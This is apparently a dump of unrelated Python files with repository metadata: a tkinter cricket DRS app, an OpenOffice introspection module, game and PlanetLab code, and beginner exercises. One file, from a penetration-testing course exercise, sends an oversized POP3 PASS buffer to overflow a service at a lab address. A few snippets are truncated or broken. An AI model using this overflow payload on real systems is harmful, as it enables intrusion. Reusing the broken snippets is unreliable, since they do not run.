comps[w]=i
return []
arr = [4, 4]
lim = 8
print get_indices_of_item_wights(arr,lim)
#%%
# find a pair with specific sum
def findPairSum(arr,s):
first=0
last=len(arr)-1
while(first<last):
if (arr[first]+arr[last]>s):
last-=1
elif arr[first]+arr[last]<s:
first+=1
else:
return arr[first],arr[last]
return []
| [
"[email protected]"
] | |
cbeac3af8c846564c43834c3869b02822384413f | 53b6b52a41ec415fec2a2d97cad524b8e9f8a4dc | /7_4_1/size.py | eb3ae38464d0a5f32857506357853e2ba0709ef4 | [] | no_license | xyalbino/pwk_exercises | 56b8aa359b19487733c0a9b98b9d9ed668723365 | c6af719381928164aee3c7ce8db685c7984269ec | refs/heads/master | 2020-06-14T22:21:34.571883 | 2019-03-11T22:07:44 | 2019-03-11T22:07:44 | 195,143,280 | 1 | 0 | null | 2019-07-04T00:30:30 | 2019-07-04T00:30:30 | null | UTF-8 | Python | false | false | 525 | py | #!/usr/bin/env python
import socket, sys
if __name__ == '__main__':
buff = "A" * 2606 + "B" * 4 + "C" * (3500 - 2606 - 4)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_conn = sock.connect(("10.11.21.97", 110))
data = sock.recv(1024)
print data
sock.send("USER test\r\n")
data = sock.recv(1024)
print data
sock.send("PASS {0}\r\n".format(buff))
data = sock.recv(1024)
print data
except socket.error:
print("[x] Unable to connect...")
finally:
sock.close()
sys.exit(0)
| [
"[email protected]"
] | |
e4b6e1cda54c6b2fd375df3d4a64e7a4eae646c4 | 808b96265c56807d9b1ddcbd93af00988bc3d5c1 | /main.py | 8aca8d644d250287044cfd44e73b7f42b8313317 | [] | no_license | shivamdattapurkayastha99/drs-system | b1af2d087d5ac04294dcad3fcdb921d22a4b4b27 | d35f347e6a8030c47dc0604490e360e4e63c1534 | refs/heads/master | 2023-07-06T18:35:33.594613 | 2021-08-10T20:20:20 | 2021-08-10T20:20:20 | 394,772,200 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,883 | py | import tkinter
import cv2
import PIL.Image,PIL.ImageTk
from functools import partial
import threading
import imutils
import time
stream=cv2.VideoCapture('clip.mp4')
def play(speed):
print(f"You clicked on play.Speed is {speed}")
frame1=stream.get(cv2.CAP_PROP_POS_FRAMES)
stream.set(cv2.CAP_PROP_POS_FRAMES,frame1+speed)
grabbed,frame=stream.read()
frame=imutils.resize(frame,width=SET_WIDTH,height=SET_HEIGHT)
frame=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image=frame
canvas.create_image(0,0,image=frame,anchor=tkinter.NW)
canvas.create_text(120,25,fill="green",font="Times 20",text="Decision Pending")
def out():
thread=threading.Thread(target=pending,args=("out",))
thread.daemon=1
thread.start()
print("player is out")
def not_out():
thread=threading.Thread(target=pending,args=("not out",))
thread.daemon=1
thread.start()
print("player is not out")
def pending(decision):
frame=cv2.cvtColor(cv2.imread("pending.png"),cv2.COLOR_BGR2RGB)
frame=imutils.resize(frame,width=SET_WIDTH,height=SET_HEIGHT)
frame=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image=frame
canvas.create_image(0,0,image=frame,anchor=tkinter.NW)
time.sleep(1)
frame=cv2.cvtColor(cv2.imread("sponsor.png"),cv2.COLOR_BGR2RGB)
frame=imutils.resize(frame,width=SET_WIDTH,height=SET_HEIGHT)
frame=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image=frame
canvas.create_image(0,0,image=frame,anchor=tkinter.NW)
time.sleep(1.5)
if decision=='out':
decisionImg='out.png'
else:
decisionImg='not_out.png'
frame=cv2.cvtColor(cv2.imread(decisionImg),cv2.COLOR_BGR2RGB)
frame=imutils.resize(frame,width=SET_WIDTH,height=SET_HEIGHT)
frame=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image=frame
canvas.create_image(0,0,image=frame,anchor=tkinter.NW)
SET_WIDTH=650
SET_HEIGHT=368
window=tkinter.Tk()
window.title("Shivam DRS")
cv_img=cv2.cvtColor(cv2.imread("welcome.png"),cv2.COLOR_BGR2RGB)
canvas=tkinter.Canvas(window,width=SET_WIDTH,height=SET_HEIGHT)
photo=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(cv_img))
image_on_canvas=canvas.create_image(0,0,ancho=tkinter.NW,image=photo)
canvas.pack()
btn=tkinter.Button(window,text="<<Previous(fast),width=50",command=partial(play,-25))
btn.pack()
btn=tkinter.Button(window,text="<<Previous(slow),width=50",command=partial(play,-2))
btn.pack()
btn=tkinter.Button(window,text="Next(fast)>>,width=50",command=partial(play,25))
btn.pack()
btn=tkinter.Button(window,text="Next(slow)>>,width=50",command=partial(play,2))
btn.pack()
btn=tkinter.Button(window,text="Give Out,width=50",command=out)
btn.pack()
btn=tkinter.Button(window,text="Give Not Out,width=50",command=not_out)
btn.pack()
window.mainloop() | [
"[email protected]"
] | |
f06b7547ea0124184f651ddac7e32fdb35e9020b | 43a38158517d5010cedc73e29b8b2342c29bdabe | /pythonpath/mytools_Mri/ui/info.py | 04290a487832b013870fbcdbf1384fae87643289 | [
"Apache-2.0"
] | permissive | billyoc/MRI | 31e14583b5de3fd6e5d770f60aaef25118c86c2b | 22cfd8bdd28cbca589b9796a6a191ce220db763d | refs/heads/master | 2021-01-17T06:47:11.945432 | 2013-03-27T05:49:37 | 2013-03-27T05:49:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,454 | py | # Copyright 2011 Tsutomu Uchino
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import traceback
import operator
try:
set()
except:
from sets import Set as set
import mytools_Mri
import mytools_Mri.values
from mytools_Mri.unovalues import TypeClass, TypeClassGroups, ParamMode
try:
long
except:
long = int
class Info(object):
def __init__(self, engine, config):
self.engine = engine
self.config = config
# informations
def get_properties_info(self, entry, config):
try:
txt = self.engine.get_properties_info(entry, config.property_only)
if config.abbrev:
abbr_old = mytools_Mri.values.ABBROLD
abbr_new = mytools_Mri.values.ABBRNEW
txt[:] = [(i[0],
i[1].replace(abbr_old, abbr_new),
i[2], i[3], i[4], i[5]) for i in txt]
if config.sorted:
try:
txt.sort(key=operator.itemgetter(0))
except:
_items = [(item[0], item) for item in txt]
_items.sort()
txt = [item for (key, item) in _items]
if config.show_labels and not config.grid:
txt.insert(0, ('(Name)', '(Value Type)', '(Value)',
'(Info.)', '(Attr.)', '(Handle)'))
mnlen = max([len(x[0]) for x in txt])
mtlen = max([len(x[1]) for x in txt])
mvlen = max([len(x[2]) for x in txt])
malen = max([len(x[4]) for x in txt])
if config.grid:
#return ((t[0], t[1], t[2], t[3], t[4], t[5]) for t in txt)
return [(t[0], t[1], t[2], t[3], t[4]) for t in txt]
else:
return ''.join([("%s %s %s %s %s %s \n" %
(t[0].ljust(mnlen), t[1].ljust(mtlen),
t[2].ljust(mvlen), t[3].ljust(8),
t[4].ljust(malen), t[5].rjust(3))) for t in txt])
except Exception as e:
print(e)
return "error"
def get_methods_info(self, entry, config):
try:
txt = self.engine.get_methods_info(entry)
if config.abbrev:
abbr_old = mytools_Mri.values.ABBROLD
abbr_new = mytools_Mri.values.ABBRNEW
txt[:] = [(i[0],
i[1].replace(abbr_old, abbr_new),
i[2].replace(abbr_old, abbr_new),
i[3].replace(abbr_old, abbr_new),
i[4].replace(abbr_old, abbr_new)) for i in txt]
if config.sorted:
try:
txt.sort(key=operator.itemgetter(0))
except:
_items = [(item[0], item) for item in txt]
_items.sort()
txt = [item for (key, item) in _items]
mnlen = max([len(x[0]) for x in txt])
malen = max([len(x[1]) for x in txt])
mrlen = max([len(x[2]) for x in txt])
mdlen = max([len(x[3]) for x in txt])
if malen > 50: malen = 50
if config.show_labels and not config.grid:
txt.insert(0, ('(Name)', '(Arguments)', '(Return Type)',
'(DeclaringClass)', '(Exceptions)'))
if config.grid:
return [(i[0], i[1], i[2], i[3], i[4]) for i in txt]
else:
return ''.join([('%s %s %s %s %s \n' %
(i[0].ljust(mnlen), i[1].ljust(malen), i[2].ljust(mrlen),
i[3].ljust(mdlen), i[4])) for i in txt])
except Exception as e:
print(e)
return "error."
def get_interfaces_listeners_info(self, entry, config):
slist = []
iinfos = self.get_interfaces_info(entry, config)
linfos = self.get_listeners_info(entry, config)
for li in linfos:
try: iinfos.remove(li)
except: pass
iinfos = list(set(iinfos))
linfos = list(set(linfos))
if config.sorted:
iinfos.sort()
linfos.sort()
if config.grid:
return [(i,) for i in iinfos] + [('',), ('Listeners',)] + [(i,) for i in linfos]
else:
return "\n".join(slist + [
"(Interfaces)", "\n".join(iinfos), '',
"(Listeners)", "\n".join(linfos)])
def get_interfaces_info(self, entry, config):
try:
#return self.engine.get_interfaces_info(self.current_entry)
return self.engine.all_interfaces_info(entry)
except Exception as e:
print(e)
def get_listeners_info(self, entry, config):
return self.engine.get_listeners_info(entry)
def get_services_info(self, entry, config):
services = []
v_services = []
try:
services = self.engine.get_services_info(entry)
if config.sorted:
services.sort()
if services and not config.grid: services.insert(0, '(Supported Service Names)')
except:
if config.grid:
return (("com.sun.star.lang.XServiceInfo interface is not supported.\n",),)
else:
return "com.sun.star.lang.XServiceInfo interface is not supported.\n"
try:
v_services = self.engine.get_available_services_info(entry)
if config.sorted:
v_services.sort()
if v_services and not config.grid: v_services.insert(0, '(Available Service Names)')
except:
pass
if config.grid:
if v_services:
return [(i,) for i in services] + [('',), ('Available Service Names',)] + [(i,) for i in v_services]
else:
return [(i,) for i in services]
else:
if v_services:
v = "\n" *2 + "\n".join(v_services)
else:
v = ""
#return "\n".join(services) + (("\n" *2 + "\n".join(v_services)) if v_services else "")
return "\n".join(services) + v
def get_struct_name(self, entry, config):
name = entry.type.getName().strip("[]")
if config.grid:
struct_name = ((name, ),)
else:
struct_name = '(Struct Name)\n%s' % name
return struct_name
def get_struct_info(self, entry, config):
try:
txt = self.engine.get_struct_info(entry)
if config.abbrev:
abbr_old = mytools_Mri.values.ABBROLD
abbr_new = mytools_Mri.values.ABBRNEW
txt[:] = [(i[0],
i[1].replace(abbr_old, abbr_new),
i[2], i[3]) for i in txt]
if config.sorted:
try:
txt.sort(key=operator.itemgetter(0))
except:
_items = [(item[0], item) for item in txt]
_items.sort()
txt = [item for (key, item) in _items]
if config.show_labels and not config.grid:
txt.insert(0, ('(Name)', '(Value Type)', '(Value)', '(AccessMode)'))
mnlen = max([len(x[0]) for x in txt])
mtlen = max([len(x[1]) for x in txt])
mvlen = max([len(x[2]) for x in txt])
if mnlen < 12: mnlen = 12
if mtlen < 16: mtlen = 16
if config.grid:
return [(t[0], t[1], t[2], '', t[3]) for t in txt]
else:
return ''.join(['%s %s %s %s\n' % (
t[0].ljust(mnlen), t[1].ljust(mtlen), t[2].ljust(mvlen), t[3]) for t in txt])
except Exception as e:
print(("get_struct_info: " + str(e)))
return "error"
def get_struct_sequence_info(self, entry, config):
"""create information about sequence of structs."""
from mytools_Mri import Entry
try:
if entry.target is None:
return 'void'
if isinstance(entry.target, tuple) and len(entry.target) == 0:
if config.grid:
return (("empty", "", "", "", ""),)
else:
return "empty"
n = entry.type.getName().count('[]')
l = list(range(len(entry.target)))
b = entry.target[:]
if n > 1:
for i in range(n -1):
l, b = get_elements(l, b)
elements = []
if len(entry.target) > 0:
for t, m in zip(b, l):
#entry = Entry(self, '', t)
#self.engine.complete(entry)
entry = self.engine.create(self, "", t)
elements.append(('(%s)' % m, self.engine.get_struct_info(entry)))
if config.abbrev:
abbr_old = mytools_Mri.values.ABBROLD
abbr_new = mytools_Mri.values.ABBRNEW
elements[:] = [
(i[0], [(j[0], j[1].replace(abbr_old, abbr_new),
j[2], j[3]) for j in i[1]]) for i in elements]
length = []
for element in elements:
length.append((max([len(x[0]) for x in element[1]]),
max([len(x[1]) for x in element[1]]),
max([len(x[2]) for x in element[1]])))
mnlen = max([x[0] for x in length])
mtlen = max([x[1] for x in length])
mvlen = max([x[2] for x in length])
if mnlen < 12: mnlen = 12
if mtlen < 16: mtlen = 16
#if config.show_labels:
if config.show_labels and not config.grid:
elements.insert(0, ('', [('(Name)', '(Value Type)', '(Value)', '(AccessMode)')]))
if config.grid:
data = []
adata = data.append
for t in elements:
adata((t[0], '', '', '', ''))
#adata((i[0], i[1], i[2], '', i[3]) for i in t[1])
for i in t[1]:
adata((i[0], i[1], i[2], '', i[3]))
return data
else:
return "\n".join(["%s\n%s" % (t[0],
"\n".join(["%s %s %s %s" % (
i[0].ljust(mnlen), i[1].ljust(mtlen),
i[2].ljust(mvlen), i[3]) for i in t[1]]
)) for t in elements]).lstrip()
except Exception as e:
print(("get_struct_sequence_info: " + str(e)))
return ''
def get_sequence_info(self, entry, config):
if config.grid:
return tuple(self.multi_array_string(entry, grid=True))
else:
return "\n".join(self.multi_array_string(entry))
def multi_array_string(self, entry, ctype="", grid=False):
value = entry.target
type_name = entry.type.getName()
n = type_name.count('[]')
if ctype == '':
ctype = type_name.strip('[]')
if grid:
if n == 1:
format = "(%03d)"
else:
format = "(%s)"
else:
if n == 1:
format = "(%03d) = %s"
else:
format = "(%s) = %s"
l = range(len(value))
b = value[:]
if n > 1:
for i in range(n -1):
l,b = get_elements(l,b)
txt = []
if ctype == 'string':
if grid:
txt = [(format % m, t, "", "", "") for t,m in zip(b,l)]
else:
txt = [format % (m,t) for t,m in zip(b,l)]
elif ctype in ['num', 'long', 'double', 'float', 'hyper', 'short']:
if grid:
txt = [(format % m, t, "", "", "") for t,m in zip(b,l)]
else:
txt = [format % (m,t) for t,m in zip(b,l)]
elif ctype == 'enum':
if grid:
txt = [(format % m, t.value, "", "", "") for t,m in zip(b,l)]
else:
txt = [format % (m,t.value) for t,m in zip(b,l)]
elif ctype == 'byte':
try:
if grid:
txt = [(format % m, hex(t), "", "", "") for t,m in zip(b,l)]
else:
txt = [format % (m, hex(t)) for t,m in zip(b,l)]
except:
if grid:
txt = [(format % m, hex(ord(t)), "", "", "") for t,m in zip(b,l)]
else:
txt = [format % (m,hex(ord(t))) for t,m in zip(b,l)]
elif ctype == 'type':
if grid:
txt = [(format % m, t.typeName, "", "", "") for t, m in zip(b,l)]
else:
txt = [format % (m,t.typeName) for t,m in zip(b,l)]
else:
if grid:
txt = [(format % m, t, "", "", "") for t, m in zip(b,l)]
else:
txt = [format % (m,t) for t,m in zip(b,l)]
#return '\n'.join(txt)
if len(txt) == 0:
if grid:
txt = (("empty", "", "", "", ""),)
else:
txt = ("empty",)
return txt
def get_elements(labels, values):
a = []
l = []
for j in range(len(values)):
p = labels[j]
d = values[j]
for i in range(len(d)):
a.append(d[i])
l.append("%03d,%03d" % (p,i))
return (l, a)
from mytools_Mri import CancelException
class ExtendedInfo(Info):
""" Supports to get or set property value. """
def make_property_value(self, property_info, old_value=None, method_info=None):
"""used to get new property value for callback."""
ARGS = TypeClassGroups.NUMERIC + [TypeClass.STRING, TypeClass.BOOLEAN]
if property_info:
prop_type = property_info.Type
if prop_type is None:
raise Exception("%s property has multiple types." % property_info.Name)
prop_name = property_info.Name
type_class = prop_type.typeClass
type_name = prop_type.typeName
elif method_info:
prop_name = method_info.getName()
return_type = method_info.getReturnType()
type_class = return_type.getTypeClasss()
type_name = return_type.getName()
else:
raise Exception()
if type_class in ARGS:
strvalue = self.engine.get_string_value(type_class, old_value)
value, state = self.dlgs.dialog_input(
"Input new value.","%s\ntype: %s\nvalue: %s" % (prop_name, type_name, strvalue))
if state:
return self.engine.get_value(value, type_name, type_class)
elif type_class == TypeClass.ENUM: # with Ref. button
strvalue = self.main.engine.get_string_value(type_class, old_value)
values = ','.join([i.Name for i in self.engine.for_name(type_name).getFields()])
value, state = self.dlgs.dialog_input2(
"Input a new value.","%s\ntype: %s\nvalue: %s\nvalues: \n%s" %
(prop_name, type_name, strvalue, values), '', type_name)
if state:
r = self.engine.get_value(value, type_name, type_class)
return r
raise CancelException('Unable to input value.')
def get_arguments(self, method):
"""used for callback to get argument."""
if not method: raise Exception('illeagal method.')
p_infos = method.getParameterInfos()
n_infos = len(p_infos)
method_name = method.Name
if n_infos == 0:
return ()
elif n_infos == 1:
if method_name in ('getByIndex', 'getByName', 'getAccessibleChild', 'getByIdentifier'):
state = False
try:
state, arg, ttype, key = self.get_arguments_for_special_methods(method)
except Exception as e:
print(e)
traceback.print_exc()
if state:
return (arg, )
# check all arguments
COMPATI_ARGS = TypeClassGroups.NUMERIC + [TypeClass.STRING, TypeClass.BOOLEAN, TypeClass.ENUM]
compati = False
for param in p_infos:
if param.aType.getTypeClass() in COMPATI_ARGS and param.aMode == ParamMode.IN:
compati = True
else:
compati = False
break
if not compati:
raise Exception('unable to get arguments from input.')
elements = []
for param in p_infos:
elements.append('%s %s %s' % (
self.engine.get_mode_string(param.aMode), param.aType.Name, param.aName))
#arg = "( %s )" % ", ".join(elements)
state, str_args = self.dlgs.dialog_elemental_input(
elements, 'input arguments', "%s(\n\t%s\n )" % (method_name, ", \n\t".join(elements)), (method.getDeclaringClass().Name, method_name))
if not state: raise CancelException("canceled.")
args = []
for param, element in zip(p_infos, str_args):
args.append(
self.engine.get_value(element, param.aType.getName(), param.aType.getTypeClass()))
return args
def get_arguments_for_special_methods(self, method):
""" """
target = self.main.current.target
method_name = method.Name
if method_name == 'getByIndex':
n = target.getCount()
selected = self.dlgs.dialog_select(tuple(range(n)))
if selected != None:
ttype = target.getElementType()
return (True, long(selected), ttype, "%s(%s)" % (method_name, selected))
elif method_name == 'getByName':
names = target.getElementNames()
selected = self.dlgs.dialog_select(names)
if selected != None:
ttype = target.getElementType()
return (True, selected, ttype, "%s(\"%s\")" % (method_name, selected))
elif method_name == 'getAccessibleChild':
n = target.getAccessibleChildCount()
selected = self.dlgs.dialog_select(tuple(range(n)))
if selected != None:
return (True, long(selected), None, "%s(%s)" % (method_name, selected))
elif method_name == 'getByIdentifier':
ids = target.getIdentifiers()
selected = self.dlgs.dialog_select(tuple([str(i) for i in ids]))
if selected is not None:
ttype = target.getElementType()
return (True, long(selected), ttype, "%s(%s)" % (method_name, selected))
return (False, None, None, None)
| [
"[email protected]"
] | |
f30e390e9256b93999d1c3a66ed1a5ae6ada94e0 | e262e64415335060868e9f7f73ab8701e3be2f7b | /.history/demo_20201106173944.py | 6d65b718ae355669c834ddbbe48686434fa086b7 | [] | no_license | Allison001/developer_test | 6e211f1e2bd4287ee26fd2b33baf1c6a8d80fc63 | b8e04b4b248b0c10a35e93128a5323165990052c | refs/heads/master | 2023-06-18T08:46:40.202383 | 2021-07-23T03:31:54 | 2021-07-23T03:31:54 | 322,807,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,275 | py | # a = 1
# if a==0:
# print("a=0")
# else:
# print("a!0")
# """
# x>1 (3x-5)
# -1<=x<=1 (x+2)
# x < -1 (5x+3)
# """
# x = int(input("输入您的数字:"))
# if x > 1:
# print(3*x-5)
# else:
# if x >= -1:
# print(x + 2)
# else:
# print(5*x+3)
# 猜数字游戏
# import random
# computet_num = random.randint(1,100)
# while True:
# people_num = int(input("请输入您的数字:"))
# if people_num < computet_num:
# print("大一点")
# elif people_num > computet_num:
# print("小一点")
# else:
# print("猜对了")
# break
# def fun1(a,b,c):
# print("这是参数a:",a)
# print("这是参数b:",b)
# print("这是参数c:",c)
# fun1(1,23,4)
# def fun1(a):
# # return "ac"
# print("a")
# fun1("c")
# def fun1(a,b,c,d):
# print(a,b,c,d)
# fun1(10,13,d=13,c=90)
# fun1 = lambda x: x+10
# print(fun1(5))
# def fun1(x):
# return x+10
# print(fun1(5))
# fun1 = lambda x,y: x+y
# print(fun1(10,12))
# list = ["ha"]
# b = {"hah"}
# c = "a"
# d = ("a","v")
# print(type(list))
# print(type(b))
# print(type(c))
# print(type(d))
lista = ["a","b","c"]
# lista.append("b")
# lista.insert(5,"e")
# lista.remove("b")
lista.pop(0)
print(lista) | [
"[email protected]"
] | |
cec74534f2de9765f471aa6aae72fcbe7d53e3ac | 0085acce00bbd20658f312f30575632b6272090d | /leetcode_python2/lc917_reverse_only_letters.py | edd5790198b06f867191c4684a3f882a2b368ac8 | [] | no_license | garderobin/Leetcode | 52fce8279e4963bc7824a19aae903ca6aad83867 | ea10ce7fe465431399e444c6ecb0b7560b17e1e4 | refs/heads/master | 2021-01-17T14:43:49.423071 | 2018-11-12T00:55:47 | 2018-11-12T00:55:47 | 51,183,667 | 0 | 1 | null | 2018-11-12T00:55:48 | 2016-02-06T01:00:36 | Java | UTF-8 | Python | false | false | 580 | py | from abc import ABCMeta, abstractmethod
class ReverseOnlyLetters:
__metaclass__ = ABCMeta
@abstractmethod
def reverse_only_letters(self, S):
"""
:type S: str
:rtype: str
"""
class ReverseOnlyLettersImpl1(ReverseOnlyLetters):
"""
Time: O(n)
Space: O(n)
"""
def reverse_only_letters(self, S):
letters, rs = [c for c in S if c.isalpha()], []
for c in S:
if c.isalpha():
rs.append(letters.pop())
else:
rs.append(c)
return ''.join(rs)
| [
"[email protected]"
] | |
2ab64215e6c7985e26ab397ec6fe152920e75e0f | 01b6a10e92f3dae773f824065a5508b073fd6d62 | /baekjoon/1837.py | 8a5748cf6fa39529be2da4aa74086b2030da1c75 | [] | no_license | jihongeek/Algo | 213989dc86b5476939776c31b12b21fba48bff8d | 8dfc9db33f611ff76c4943be9868847c3c0501b4 | refs/heads/master | 2023-08-28T23:32:42.448354 | 2023-08-12T11:26:08 | 2023-08-12T11:26:08 | 188,658,216 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 80 | py | from sys import stdin
p,k = map(int,stdin.readline().strip())
for i in range() | [
"[email protected]"
] | |
b8466fc6eb726ee2342e5e499d2da3d64d0cb182 | 76938f270e6165514162856b2ed33c78e3c3bcb5 | /lib/coginvasion/battle/TurretGag.py | f6649cdc3a30755cf243d311c6153058e48d7e42 | [] | no_license | coginvasion/src | 9a5ec682845cc4c9c013fcc35e9b379bd4360b6c | 2d7fcdb0cd073050250cb51292ee48300a9fe19f | refs/heads/master | 2021-01-19T06:50:11.786112 | 2015-11-08T12:28:52 | 2015-11-08T12:28:52 | 61,545,543 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,296 | py | # Embedded file name: lib.coginvasion.battle.TurretGag
"""
Filename: TurretGag.py
Created by: DecodedLogic (10Aug15)
"""
from panda3d.core import CollisionSphere, CollisionNode, BitMask32, CollisionHandlerEvent, NodePath
from direct.showbase.DirectObject import DirectObject
from direct.interval.ProjectileInterval import ProjectileInterval
from direct.actor.Actor import Actor
from lib.coginvasion.globals import CIGlobals
from lib.coginvasion.gags.GagManager import GagManager
class TurretGag(DirectObject):
def __init__(self, turret, collideEventName, gagName):
DirectObject.__init__(self)
self.turret = turret
self.collideEventName = collideEventName
self.eventName = 'turretGagSensor' + str(id(self)) + '-into'
self.trackName = 'turretGagTrack' + str(id(self))
self.track = None
self.gravityMult = 0.9
self.duration = 2.5
self.setClass(gagName)
return
def setClass(self, gagName):
gagMgr = GagManager()
self.gagClass = gagMgr.getGagByName(gagName)
self.gag = None
return
def build(self):
self.gagClass.build()
self.gag = self.gagClass.getGag()
self.gag.reparentTo(self.turret.getCannon())
self.gag.setY(5.2)
self.gag.setHpr(90, -90, 90)
if isinstance(self.gag, Actor):
self.gag.loop('chan')
def shoot(self, rangeVector):
if not self.gag:
return
rangeNode = NodePath('Shoot Range')
rangeNode.reparentTo(self.turret.getCannon())
rangeNode.setScale(render, 1)
rangeNode.setPos(rangeVector)
rangeNode.setHpr(90, -90, 90)
self.gag.setScale(self.gag.getScale(render))
self.gag.setScale(self.gag.getScale(render))
self.gag.setPos(self.gag.getPos(render))
self.gag.reparentTo(render)
self.gag.setHpr(rangeNode.getHpr(render))
base.audio3d.attachSoundToObject(self.gagClass.woosh, self.gag)
self.gagClass.woosh.play()
self.track = ProjectileInterval(self.gag, startPos=self.gag.getPos(render), endPos=rangeNode.getPos(render), gravityMult=self.gravityMult, duration=self.duration, name=self.trackName)
self.track.setDoneEvent(self.track.getName())
self.acceptOnce(self.track.getDoneEvent(), self.cleanup)
self.track.start()
fireSfx = base.audio3d.loadSfx('phase_4/audio/sfx/MG_cannon_fire_alt.mp3')
base.audio3d.attachSoundToObject(fireSfx, self.turret.getCannon())
fireSfx.play()
if self.turret.isLocal():
self.buildCollisions()
self.acceptOnce(self.eventName, self.handleCollision)
def getGag(self):
return self.gag
def buildCollisions(self):
pieSphere = CollisionSphere(0, 0, 0, 1)
pieSensor = CollisionNode('turretGagSensor' + str(id(self)))
pieSensor.addSolid(pieSphere)
pieNP = self.gag.attachNewNode(pieSensor)
pieNP.setCollideMask(BitMask32(0))
pieNP.node().setFromCollideMask(CIGlobals.WallBitmask | CIGlobals.FloorBitmask)
event = CollisionHandlerEvent()
event.set_in_pattern('%fn-into')
event.set_out_pattern('%fn-out')
base.cTrav.addCollider(pieNP, event)
def handleCollision(self, entry):
messenger.send(self.collideEventName, [entry, self])
def getID(self):
return self.gagClass.getID()
def getCollideEventName(self):
return self.collideEventName
def cleanup(self):
if hasattr(self, 'collideEventName'):
del self.collideEventName
if self.track:
self.track.finish()
self.track = None
if self.turret:
if self.turret.entities and self in self.turret.entities:
self.turret.entities.remove(self)
self.turret = None
self.ignore(self.eventName)
self.duration = None
self.gravityMult = None
self.eventName = None
self.trackName = None
if self.gagClass:
self.gagClass.cleanupGag()
self.gagClass = None
if self.gag:
if isinstance(self.gag, Actor):
self.gag.cleanup()
self.gag.removeNode()
self.gag = None
return | [
"[email protected]"
] | |
23abc26505d01fa5cea8932a4626c30f652939e6 | de6fb3a55196b6bd36a4fda0e08ad658679fb7a1 | /expedient/src/python/expedient/clearinghouse/geni/planetlab/sfa-models.py | 0b196d17769a39223a7fdf4a5aa52bdb1bd29381 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | dana-i2cat/felix | 4a87af639e4c7db686bfa03f1ae4ce62711615e3 | 059ed2b3308bda2af5e1942dc9967e6573dd6a53 | refs/heads/master | 2021-01-02T23:12:43.840754 | 2016-02-04T10:04:24 | 2016-02-04T10:04:24 | 17,132,912 | 4 | 4 | null | null | null | null | UTF-8 | Python | false | false | 16,040 | py | '''
Created on Jul 4, 2010
@author: jnaous
'''
from django.db import models
from expedient.clearinghouse.resources.models import Resource, Sliver
from expedient.clearinghouse.geni.models import GENIAggregate, GENISliceInfo
from xml.etree import cElementTree as et
import calendar
from exceptions import RSpecParsingException, NameConflictException
import logging
logger = logging.getLogger("PlanetLabModels")
def get_start_duration(start_time=None, end_time=None):
"""
Get the start_time and duration in POSIX seconds from the epoch.
@keyword start_time: Optional. A start time for the whole network.
Default = None.
@type start_time: C{datetime.datetime} instance
@keyword end_time: Optional. An end time for the whole network.
Default = None.
@type end_time: C{datetime.datetime} instance
@return: a tuple (start_time, duration)
@rtype: (int or None, int or None)
"""
if start_time:
start_time_sec = calendar.timegm(start_time.timetuple())
if end_time:
duration = end_time - start_time
duration = duration.total_seconds()
else:
duration = None
else:
start_time_sec = None
duration = None
return (start_time_sec, duration)
class PlanetLabSliceInfo(GENISliceInfo):
"""
Subclasses L{GENIAggregateSliceInfo} to specify additional attributes
for PlanetLab RSpecs
"""
start_time = models.DateTimeField(blank=True, null=True)
end_time = models.DateTimeField(blank=True, null=True)
class PlanetLabNetwork(Resource):
"""
PlanetLab NetSpec.
"""
def __unicode__(self):
return u"PlanetLabNetwork %s" % self.name
@classmethod
def get_from_elem(cls, pl_aggregate, network_elem):
"""
Create or update the NetSpec in the DB from the Element C{network_elem}
that is found in an RSpec. If the same name is in another aggregate,
a L{NameConflictException} is raised.
@param pl_aggregate: The PlanetLabAggregate to which this network
belongs.
@type pl_aggregate: L{PlanetLabAggregate}
@param network_elem: a NetSpec element from an RSpec.
@type network_elem: C{xml.etree.ElementTree.Element}
"""
name = network_elem.get("name")
if not name:
raise RSpecParsingException("Could not find NetSpec name.")
try:
net = cls.objects.get(name=name)
except cls.DoesNotExist:
net = cls.objects.create(
name=name, aggregate=pl_aggregate)
if net.aggregate.pk != pl_aggregate.pk:
raise NameConflictException(
"Network %s is in a different aggregate." % name)
if net.available == False:
net.available = True
net.update_timestamp()
net.save()
# Update the nodes in the network
current_node_pks = set(
net.nodes.filter(available=True).values_list("pk", flat=True))
new_node_pks = set()
node_elems = network_elem.findall(".//NodeSpec")
for node_elem in node_elems:
node = PlanetLabNode.get_from_elem(net, node_elem)
new_node_pks.add(node.pk)
logger.debug("Added %s." % node)
# set available to False for old nodes
old_node_pks = current_node_pks - new_node_pks
for pk in old_node_pks:
node = PlanetLabNode.objects.get(pk=pk)
node.available = False
node.update_timestamp()
node.save()
logger.debug("Set %s to unavailable." % node)
return net
def get_as_elem(self, slice=None):
"""
Get the PlanetLabNetwork as ElementTree element so it can be added
to the RSpec and dumped as XML.
@keyword slice: Optional. Slice for which we are producing this RSpec.
Specifying the slice will set the <sliver /> tag for PlanetLab
nodes that are part of the slice.
@type slice: L{expedient.clearinghouse.slice.models.Slice}.
@return: the NetSpec element
@rtype: C{xml.etree.ElementTree.Element}
"""
# see if this network has a sliver in the slice.
netspec = et.Element("NetSpec", dict(
name=self.name,
))
if slice:
try:
sliver = slice.sliver_set.get(resource__pk=self.pk)
net_sliver = sliver.as_leaf_class()
stime, duration = get_start_duration(
net_sliver.start_time, net_sliver.end_time)
netspec["start_time"] = "%s" % stime
netspec["duration"] = "%s" % duration
except Sliver.DoesNotExist:
pass
for rsc_type in ["node"]: #, "link"]:
# Do all the DB ops in one go to be efficient. If we do this for
